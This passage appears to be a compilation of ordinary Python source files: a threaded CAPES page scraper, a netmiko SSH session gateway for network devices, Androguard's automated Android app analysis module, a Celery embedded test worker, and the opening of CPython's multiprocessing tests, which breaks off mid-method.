self.mutex.acquire()
try:
self.crashed = True
finally:
self.mutex.release()
# Thread-safe way of checking if the program has crashed
def has_crashed(self):
local_crashed = False
self.mutex.acquire()
try:
local_crashed = self.crashed
finally:
self.mutex.release()
return local_crashed
def scrape(self):
print('Beginning CAPES scraping.')
self.iter_departments()
print('Finished CAPES scraping.')
def iter_departments(self):
# Number of threads is equivalent to the number of processors on the machine
pool = []
pool_size = os.cpu_count()
print("Initializing {} threads ...".format(pool_size))
# Allocate a pool of threads; each worker handles an equal subset of the work
for i in range(pool_size):
t = Thread(target=self.iter_departments_by_thread_handle_errors, args=[i, pool_size])
t.start()
pool.append(t)
# Block the main thread until each worker finishes
for t in pool:
t.join()
def iter_departments_by_thread_handle_errors(self, thread_id, num_threads):
# If a thread receives an error during execution, kill all threads & mark program as crashed
try:
self.iter_departments_by_thread(thread_id, num_threads)
except:
print("Error encountered by thread {}. Gracefully exiting ...".format(thread_id), file=sys.stderr)
traceback.print_exc(file=sys.stderr)
self.set_crashed()
def iter_departments_by_thread(self, thread_id, num_threads):
print("Thread {} is starting.".format(thread_id))
# Iterate through each department that the thread is assigned to
for counter in range(thread_id, len(self.departments), num_threads):
# Exit if any part of the scraper has crashed
if self.has_crashed():
print("Thread {} is exiting gracefully ...".format(thread_id), file=sys.stderr)
return
department = self.departments[counter]
# Construct the CAPES url for all courses in that department
url = CAPES_URL + department
url = url.rstrip()
# Make a request to the specific CAPES url
response = self.get_page_with_retries(url, thread_id)
# Store the requested HTML in the cache
self.store_page(department, response.text, thread_id)
print("Thread {} has finished the work assigned to it.".format(thread_id))
# Tries getting the given page {max_retries} number of times before quitting
def get_page_with_retries(self, page_url, thread_id):
retries = 0
max_retries = MAX_RETRIES
while True:
try:
response = requests.get(page_url, headers={
'Host': CAPES_HOST,
'Accept': CAPES_ACCEPT,
'User-Agent': CAPES_USER_AGENT
})
return response
except Timeout as timeout_exception:
retries += 1
print ("[T{0}] Failed to download page {1}.".format(thread_id, page_url))
if retries < max_retries:
print ("[T{0}] {1}/{2} attempts. Retrying ...".format(thread_id, retries, max_retries))
else:
print ("[T{0}] {1}/{2} attempts. All retries have been exhausted.".format(thread_id, retries, max_retries))
raise timeout_exception
# Tries to store the given page contents into a file in our cache
def store_page(self, department, page_contents, thread_id):
# Cache page content appropriately
with open(os.path.join(CAPES_HTML_PATH, department + '.html'), 'w') as f:
f.write(page_contents)
print('[T{0}] Saving'.format(thread_id), department, 'to', f.name, '...')
|
ssh.py
|
import sys
import time
from threading import Lock, Thread
from random import randint
from netmiko import SSHDetect, ConnectHandler
import pprint
import os
from pathlib import Path
try:
local_dir = os.path.dirname(os.path.realpath(__file__))
except Exception:
local_dir = os.getcwd()
DEVICE_FILE_PATH = str(Path(local_dir,'setup_cfg', 'device_cfg.txt'))
def netmiko_attr(host, ssh_username, ssh_password, device_type='autodetect'):
return {
"device_type": device_type,
"host": host,
"username": ssh_username,
"password": ssh_password,
}
def _generate_session_id():
return int(randint(1, 9999))
def append_missing_ssh_thread_to_results(missing_list):
missing_dict = {}
for missing_device in missing_list:
missing_dict[missing_device] = 'No SSH Threader found'
return missing_dict
class SSHThreader:
def __init__(self, ssh_username, ssh_password):
self.ssh_username = ssh_username
self.ssh_password = ssh_password
self.session_pipeline = []
self.lock = Lock()
self.session_locked = False
self.main_controller_dict = {}
self.process_job = False
self.status_dict = {}
self.read_device_file()
self.flask_not_ok = False
if self.cfg_file_found:
self._create_status_dict()
print('SSH API Gateway is up, check status to confirm SSH sessions')
else:
print('SSH API Gateway is down, failed to load device file')
def _create_status_dict(self):
for device in self.device_list:
self.status_dict[device] = False
def read_device_file(self):
try:
with open(DEVICE_FILE_PATH, 'r') as f:
self.device_list = list(set([x.replace('\n', '') for x in f.readlines()[1:]]))
print(self.device_list)
self.cfg_file_found = True
except Exception:
self.device_list = []
self.cfg_file_found = False
finally:
self.ssh_server_active = False
def request_session(self):
with self.lock:
session_id = _generate_session_id()
self.session_pipeline.append(session_id)
if self.session_locked is False:
self.session_locked = True
return self.session_locked, session_id
else:
return False, session_id
def disable_ssh_server(self):
self.ssh_server_active = False
def enable_ssh_server(self):
if self.ssh_server_active is True:
return self.cfg_file_found
else:
self.ssh_server_active = True
return self.cfg_file_found
def check_session_status(self, session_id):
with self.lock:
if self.session_locked:
return self.session_locked
else:
if session_id != self.session_pipeline[0]:
return True
else:
return False
def session_clean_up(self, session_id):
with self.lock:
self.session_pipeline.remove(session_id)
self.session_locked = False
print(f'released session id {session_id}, session_lock is now set to {self.session_locked}')
def _apply_results_for_off_line_sessions(self):
"""confirms that all ssh sessions are ready and available based on the job keys (devices)
if a device is False, output and error results are applied since the SSH threader is offline"""
for device in self.job.keys():
if self.status_dict.get(device) is False:
self.job_errors.update({device: 'ssh session not established'})
self.result_dict = {**self.result_dict, **{device: 'SSH session is not established'}}
elif self.status_dict.get(device) is None:
self.job_errors.update({device: 'ssh session not started'})
def run_job(self, job):
self.job = job
wait_for_results = True
timer_not_exceeded = True
self.process_job = True
self.result_dict = {}
self.job_errors = {}
job_device_list = list(self.job.keys()).copy()
start = time.time()
devices_not_found_in_ssh_threader_list = [x for x in job_device_list if x not in self.device_list]
if len(devices_not_found_in_ssh_threader_list) > 0:
self.result_dict = append_missing_ssh_thread_to_results(devices_not_found_in_ssh_threader_list)
print(devices_not_found_in_ssh_threader_list)
self._apply_results_for_off_line_sessions()
while wait_for_results and timer_not_exceeded:
print(f'Devices which are currently reporting results are {self.result_dict.keys()}')
print(f'Looking for result output from {job_device_list}')
if set(self.result_dict.keys()) == set(job_device_list):
wait_for_results = False
print(self.result_dict)
print('all threads accounted for, terminating')
time.sleep(1)
if int(time.time() - start) > 15:
timer_not_exceeded = False
print('timer exceeded 15 secs')
self.result_dict.update({'errors': self.job_errors})
self.process_job = False
return self.result_dict
def start_threaders(self):
for device_id in self.device_list:
Thread(target=self._ssh_threaders, args=(device_id,)).start()
def _ssh_threaders(self, device_id):
ssh_session_ready = False
while self.ssh_server_active:
while ssh_session_ready is False:
print(f'\nstarting ssh session to {device_id}')
try:
guesser = SSHDetect(**netmiko_attr(device_id,
self.ssh_username,
self.ssh_password))
ssh_session = ConnectHandler(**netmiko_attr(device_id,
self.ssh_username,
self.ssh_password,
guesser.autodetect()))
prompt = ssh_session.find_prompt()
ssh_session_ready = True
print(f'\nSSH session {device_id} now established, now waiting for a job to arrive')
with self.lock:
self.status_dict.update({device_id: True})
print(self.status_dict)
ssh_base_timer = int(time.time())
except Exception as e:
print(e)
print(f'\nSSH session to {device_id} has failed, trying again in 30 seconds')
time.sleep(30)
self.status_dict.update({device_id: False})
if self.ssh_server_active is False:
break
if self.ssh_server_active is False:
self.status_dict.update({device_id: False})
break
if int(time.time()) - ssh_base_timer > 60:
try:
_ = ssh_session.find_prompt()
ssh_base_timer = int(time.time())
except Exception:
ssh_session_ready = False
pass
while self.process_job and ssh_session_ready:
try:
try:
_ = ssh_session.find_prompt()
except Exception:
ssh_session_ready = False
pass
if ssh_session_ready and self.job.get(device_id) is not None:
show_output: dict = {}
for command in self.job.get(device_id):
print(f'sending {command}')
try:
show_output.update({command: ssh_session.send_command(command,
expect_string=rf'{prompt}',
cmd_verify=False)})
except Exception:
show_output.update({command: 'failed to send'})
print(f'{device_id} returning success')
with self.lock:
self.result_dict = {**self.result_dict, **{device_id: show_output}}
self.job_errors.update({device_id: 'no error detected'})
self.job.pop(device_id)
time.sleep(1)
except Exception:
print(f'{device_id} trying to restart')
ssh_session_ready = False
else:
time.sleep(5)
try:
_ = ssh_session.find_prompt()
except Exception:
print(f'{device_id} trying to restart')
ssh_session_ready = False
self.status_dict.update({device_id: False})
else:
ssh_session.disconnect()
print(f'ssh disabled for {device_id}')
self.status_dict.update({device_id: False})
def ssh_server():
try:
device_cfg_file_found = ssh_threader.enable_ssh_server()
if device_cfg_file_found:
Thread(target=ssh_threader.start_threaders).start()
print('Threading Status')
pprint.pprint(ssh_threader.status_dict)
while True:
input_value = input('please select either start,status,stop or terminate: ')
if input_value == 'start':
device_cfg_file_found = ssh_threader.enable_ssh_server()
service_enabled = ssh_threader.ssh_server_active
if service_enabled and device_cfg_file_found:
Thread(target=ssh_threader.start_threaders).start()
print('Threading Status')
pprint.pprint(ssh_threader.status_dict)
else:
if service_enabled is False:
print('service is already enabled, please stop and restart')
if device_cfg_file_found is False:
print('device CFG is missing or has errors')
elif input_value == 'stop' or input_value == 'terminate':
ssh_threader.disable_ssh_server()
pprint.pprint(ssh_threader.status_dict)
time_now = int(time.time())
timer_expired = False
while len([x for x in ssh_threader.status_dict if ssh_threader.status_dict.get(x) is True]) > 0 or \
timer_expired:
time.sleep(1)
print('graceful shutdown in progress, please wait')
if int(time.time()) - time_now > 15:
timer_expired = True
else:
print('\ngraceful shutdown has completed\n')
if input_value == 'terminate':
print('terminating session')
sys.exit()
elif input_value == 'status':
pprint.pprint(ssh_threader.status_dict)
elif input_value == 'clear':
os.system('clear')
else:
print('ERROR with CFG File')
except KeyboardInterrupt:
ssh_threader.disable_ssh_server()
time_now = int(time.time())
timer_expired = False
while len([x for x in ssh_threader.status_dict if ssh_threader.status_dict.get(x) is True]) > 0 or \
timer_expired:
time.sleep(1)
print('graceful shutdown in progress, please wait')
if int(time.time()) - time_now > 15:
timer_expired = True
else:
sys.exit()
|
auto.py
|
# This file is part of Androguard.
#
# Copyright (C) 2012, Anthony Desnos <desnos at t0t0.fr>
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import Queue
import threading
import time
import zlib
from androguard.core import androconf
from androguard.core.bytecodes import apk, dvm
from androguard.core.analysis import analysis
from androguard.core.androconf import debug
class AndroAuto(object):
"""
The main class which analyse automatically android apps by calling methods
from a specific object
:param settings: the settings of the analysis
:type settings: dict
"""
def __init__(self, settings):
self.settings = settings
def dump(self):
"""
Dump the analysis
"""
self.settings["my"].dump()
def dump_file(self, filename):
"""
Dump the analysis in a filename
"""
self.settings["my"].dump_file(filename)
def go(self):
"""
Launch the analysis
"""
myandro = self.settings["my"]
def worker(idx, q):
debug("Running worker-%d" % idx)
while True:
a, d, dx, axmlobj, arscobj = None, None, None, None, None
try:
filename, fileraw = q.get()
id_file = zlib.adler32(fileraw)
debug("(worker-%d) get %s %d" % (idx, filename, id_file))
log = self.settings["log"](id_file, filename)
is_analysis_dex, is_analysis_adex = True, True
debug("(worker-%d) filtering file %d" % (idx, id_file))
filter_file_ret, filter_file_type = myandro.filter_file(log, fileraw)
if filter_file_ret:
debug("(worker-%d) analysis %s" % (id_file, filter_file_type))
if filter_file_type == "APK":
a = myandro.create_apk(log, fileraw)
is_analysis_dex = myandro.analysis_apk(log, a)
fileraw = a.get_dex()
filter_file_type = androconf.is_android_raw(fileraw)
elif filter_file_type == "AXML":
axmlobj = myandro.create_axml(log, fileraw)
myandro.analysis_axml(log, axmlobj)
elif filter_file_type == "ARSC":
arscobj = myandro.create_arsc(log, fileraw)
myandro.analysis_arsc(log, arscobj)
if is_analysis_dex and filter_file_type == "DEX":
d = myandro.create_dex(log, fileraw)
is_analysis_adex = myandro.analysis_dex(log, d)
elif is_analysis_dex and filter_file_type == "DEY":
d = myandro.create_dey(log, fileraw)
is_analysis_adex = myandro.analysis_dey(log, d)
if is_analysis_adex and d:
dx = myandro.create_adex(log, d)
myandro.analysis_adex(log, dx)
myandro.analysis_app(log, a, d, dx)
myandro.finish(log)
except Exception, why:
myandro.crash(log, why)
myandro.finish(log)
del a, d, dx, axmlobj, arscobj
q.task_done()
q = Queue.Queue(self.settings["max_fetcher"])
for i in range(self.settings["max_fetcher"]):
t = threading.Thread(target=worker, args=[i, q])
t.daemon = True
t.start()
terminated = True
while terminated:
terminated = myandro.fetcher(q)
try:
if terminated:
time.sleep(10)
except KeyboardInterrupt:
terminated = False
q.join()
class DefaultAndroAnalysis(object):
"""
This class can be used as a template in order to analyse apps
"""
def fetcher(self, q):
"""
This method is called to fetch a new app in order to analyse it. The queue
must be fill with the following format: (filename, raw)
:param q: the Queue to put new app
"""
pass
def filter_file(self, log, fileraw):
"""
This method is called in order to filer a specific app
:param log: an object which corresponds to a unique app
:param fileraw: the raw app (a string)
:rtype: a set with 2 elements, the return value (boolean) if it is necessary to
continue the analysis and the file type
"""
file_type = androconf.is_android_raw(fileraw)
if file_type == "APK" or file_type == "DEX" or file_type == "DEY" or file_type == "AXML" or file_type == "ARSC":
if file_type == "APK":
if androconf.is_valid_android_raw(fileraw):
return (True, "APK")
else:
return (True, file_type)
return (False, None)
def create_axml(self, log, fileraw):
"""
This method is called in order to create a new AXML object
:param log: an object which corresponds to a unique app
:param fileraw: the raw axml (a string)
:rtype: an :class:`APK` object
"""
return apk.AXMLPrinter(fileraw)
def create_arsc(self, log, fileraw):
"""
This method is called in order to create a new ARSC object
:param log: an object which corresponds to a unique app
:param fileraw: the raw arsc (a string)
:rtype: an :class:`APK` object
"""
return apk.ARSCParser(fileraw)
def create_apk(self, log, fileraw):
"""
This method is called in order to create a new APK object
:param log: an object which corresponds to a unique app
:param fileraw: the raw apk (a string)
:rtype: an :class:`APK` object
"""
return apk.APK(fileraw, raw=True, zipmodule=2)
def create_dex(self, log, dexraw):
"""
This method is called in order to create a DalvikVMFormat object
:param log: an object which corresponds to a unique app
:param dexraw: the raw classes.dex (a string)
:rtype: a :class:`DalvikVMFormat` object
"""
return dvm.DalvikVMFormat(dexraw)
def create_dey(self, log, deyraw):
"""
This method is called in order to create a DalvikOdexVMFormat object
:param log: an object which corresponds to a unique app
:param dexraw: the raw odex file (a string)
:rtype: a :class:`DalvikOdexVMFormat` object
"""
return dvm.DalvikOdexVMFormat(deyraw)
def create_adex(self, log, dexobj):
"""
This method is called in order to create a VMAnalysis object
:param log: an object which corresponds to a unique app
:param dexobj: a :class:`DalvikVMFormat` object
:rytpe: a :class:`VMAnalysis` object
"""
return analysis.uVMAnalysis(dexobj)
def analysis_axml(self, log, axmlobj):
"""
This method is called in order to know if the analysis must continue
:param log: an object which corresponds to a unique app
:param axmlobj: a :class:`AXMLPrinter` object
:rtype: a boolean
"""
return True
def analysis_arsc(self, log, arscobj):
"""
This method is called in order to know if the analysis must continue
:param log: an object which corresponds to a unique app
:param arscobj: a :class:`ARSCParser` object
:rtype: a boolean
"""
return True
def analysis_apk(self, log, apkobj):
"""
This method is called in order to know if the analysis must continue
:param log: an object which corresponds to a unique app
:param apkobj: a :class:`APK` object
:rtype: a boolean
"""
return True
def analysis_dex(self, log, dexobj):
"""
This method is called in order to know if the analysis must continue
:param log: an object which corresponds to a unique app
:param dexobj: a :class:`DalvikVMFormat` object
:rtype: a boolean
"""
return True
def analysis_dey(self, log, deyobj):
"""
This method is called in order to know if the analysis must continue
:param log: an object which corresponds to a unique app
:param deyobj: a :class:`DalvikOdexVMFormat` object
:rtype: a boolean
"""
return True
def analysis_adex(self, log, adexobj):
"""
This method is called in order to know if the analysis must continue
:param log: an object which corresponds to a unique app
:param adexobj: a :class:`VMAnalysis` object
:rtype: a boolean
"""
return True
def analysis_app(self, log, apkobj, dexobj, adexobj):
"""
This method is called if you wish to analyse the final app
:param log: an object which corresponds to a unique app
:param apkobj: a :class:`APK` object
:param dexobj: a :class:`DalvikVMFormat` object
:param adexobj: a :class:`VMAnalysis` object
"""
pass
def finish(self, log):
"""
This method is called before the end of the analysis
:param log: an object which corresponds to a unique app
"""
pass
def crash(self, log, why):
"""
This method is called if a crash appends
:param log: an object which corresponds to a unique app
:param why: the string exception
"""
pass
def dump(self):
"""
This method is called to dump the result
:param log: an object which corresponds to a unique app
"""
pass
def dump_file(self, filename):
"""
This method is called to dump the result in a file
:param log: an object which corresponds to a unique app
:param filename: the filename to dump the result
"""
pass
class DirectoryAndroAnalysis(DefaultAndroAnalysis):
"""
A simple class example to analyse a directory
"""
def __init__(self, directory):
self.directory = directory
def fetcher(self, q):
for root, dirs, files in os.walk(self.directory, followlinks=True):
if files != []:
for f in files:
real_filename = root
if real_filename[-1] != "/":
real_filename += "/"
real_filename += f
q.put((real_filename, open(real_filename, "rb").read()))
return False
|
worker.py
|
"""Embedded workers for integration tests."""
from __future__ import absolute_import, unicode_literals
import os
import threading
from contextlib import contextmanager
from celery import worker
from celery.result import _set_task_join_will_block, allow_join_result
from celery.utils.dispatch import Signal
from celery.utils.nodenames import anon_nodename
WORKER_LOGLEVEL = os.environ.get('WORKER_LOGLEVEL', 'error')
test_worker_starting = Signal(
name='test_worker_starting',
providing_args={},
)
test_worker_started = Signal(
name='test_worker_started',
providing_args={'worker', 'consumer'},
)
test_worker_stopped = Signal(
name='test_worker_stopped',
providing_args={'worker'},
)
class TestWorkController(worker.WorkController):
"""Worker that can synchronize on being fully started."""
def __init__(self, *args, **kwargs):
# type: (*Any, **Any) -> None
self._on_started = threading.Event()
super(TestWorkController, self).__init__(*args, **kwargs)
def on_consumer_ready(self, consumer):
# type: (celery.worker.consumer.Consumer) -> None
"""Callback called when the Consumer blueprint is fully started."""
self._on_started.set()
test_worker_started.send(
sender=self.app, worker=self, consumer=consumer)
def ensure_started(self):
# type: () -> None
"""Wait for worker to be fully up and running.
Warning:
Worker must be started within a thread for this to work,
or it will block forever.
"""
self._on_started.wait()
@contextmanager
def start_worker(app,
concurrency=1,
pool='solo',
loglevel=WORKER_LOGLEVEL,
logfile=None,
perform_ping_check=True,
ping_task_timeout=10.0,
**kwargs):
# type: (Celery, int, str, Union[str, int],
# str, bool, float, **Any) -> # Iterable
"""Start embedded worker.
Yields:
celery.app.worker.Worker: worker instance.
"""
test_worker_starting.send(sender=app)
with _start_worker_thread(app,
concurrency=concurrency,
pool=pool,
loglevel=loglevel,
logfile=logfile,
**kwargs) as worker:
if perform_ping_check:
from .tasks import ping
with allow_join_result():
assert ping.delay().get(timeout=ping_task_timeout) == 'pong'
yield worker
test_worker_stopped.send(sender=app, worker=worker)
@contextmanager
def _start_worker_thread(app,
concurrency=1,
pool='solo',
loglevel=WORKER_LOGLEVEL,
logfile=None,
WorkController=TestWorkController,
**kwargs):
# type: (Celery, int, str, Union[str, int], str, Any, **Any) -> Iterable
"""Start Celery worker in a thread.
Yields:
celery.worker.Worker: worker instance.
"""
setup_app_for_worker(app, loglevel, logfile)
assert 'celery.ping' in app.tasks
# Make sure we can connect to the broker
with app.connection(hostname=os.environ.get('TEST_BROKER')) as conn:
conn.default_channel.queue_declare
worker = WorkController(
app=app,
concurrency=concurrency,
hostname=anon_nodename(),
pool=pool,
loglevel=loglevel,
logfile=logfile,
# not allowed to override TestWorkController.on_consumer_ready
ready_callback=None,
without_heartbeat=True,
without_mingle=True,
without_gossip=True,
**kwargs)
t = threading.Thread(target=worker.start)
t.start()
worker.ensure_started()
_set_task_join_will_block(False)
yield worker
from celery.worker import state
state.should_terminate = 0
t.join(10)
state.should_terminate = None
@contextmanager
def _start_worker_process(app,
concurrency=1,
pool='solo',
loglevel=WORKER_LOGLEVEL,
logfile=None,
**kwargs):
# type (Celery, int, str, Union[int, str], str, **Any) -> Iterable
"""Start worker in separate process.
Yields:
celery.app.worker.Worker: worker instance.
"""
from celery.apps.multi import Cluster, Node
app.set_current()
cluster = Cluster([Node('testworker1@%h')])
cluster.start()
yield
cluster.stopwait()
def setup_app_for_worker(app, loglevel, logfile):
# type: (Celery, Union[str, int], str) -> None
"""Setup the app to be used for starting an embedded worker."""
app.finalize()
app.set_current()
app.set_default()
type(app.log)._setup = False
app.log.setup(loglevel=loglevel, logfile=logfile)
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
from test.support import hashlib_helper
from test.support import import_helper
from test.support import socket_helper
from test.support import threading_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = import_helper.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
support.skip_if_broken_multiprocessing_synchronize()
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
threading_helper.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
